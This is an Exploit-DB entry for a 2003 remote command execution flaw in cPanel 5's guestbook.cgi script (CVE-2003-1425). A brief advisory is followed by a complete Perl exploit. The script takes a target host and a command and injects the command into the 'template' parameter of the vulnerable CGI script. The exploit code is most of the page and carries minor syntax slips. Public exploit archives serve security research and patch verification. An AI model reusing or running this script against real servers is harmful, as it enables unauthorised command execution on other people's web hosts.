cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (2)

EDB-ID:

22261

CVE:

2003-1425

EDB Verified:

Author:

CaMaLeoN

Type:

webapps

Exploit: /

Platform:

CGI

Date:

2003-02-19

Vulnerable App:

source: https://www.securityfocus.com/bid/6882/info
 
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
 
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
 
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.

#!usr/bin/perl
use LWP::UserAgent
print "##########################################\n";
print "#                                        #\n";
print "#      Remote Exploit for Cpanel 5       #\n";
print "#                                        #\n";
print "##########################################\n";
print "                           C0d3r: CaMaLeoN\n";
die "Use: $0 <host> <command>\n" unless ($ARGV[1]);
$web=$ARGV[0];
$comando=$ARGV[1];
$fallos="cgi-sys/guestbook.cgi?user=cpanel&template=$comando";
$url="http://$web/$fallos";
$ua = LWP::UserAgent->new();
$request = HTTP::Request->new('HEAD', $url);
$response = $ua->request($request);
if ($response->code == 200){
                            print "Command sent.\n";
                           }
                           else
                           {
                            print "The command could not be sent.\n";
                           }

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services